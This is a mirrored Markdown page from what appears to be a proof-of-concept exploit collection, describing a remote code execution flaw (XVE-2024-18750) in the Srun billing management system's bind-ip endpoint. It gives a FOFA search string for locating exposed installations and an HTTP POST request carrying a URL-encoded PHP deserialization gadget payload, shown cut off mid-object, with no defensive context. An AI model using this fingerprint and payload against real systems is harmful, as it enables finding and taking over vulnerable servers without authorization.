mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
21 lines
387 B
Markdown
21 lines
387 B
Markdown
# 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
```yaml
|
|
"/js/lib/slimscroll.js"
|
|
```
|
|
|
|
## poc
|
|
|
|
```python
|
|
POST /strategy/ip/bind-ip HTTP/2
|
|
Host:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
|
|
```
|
|
|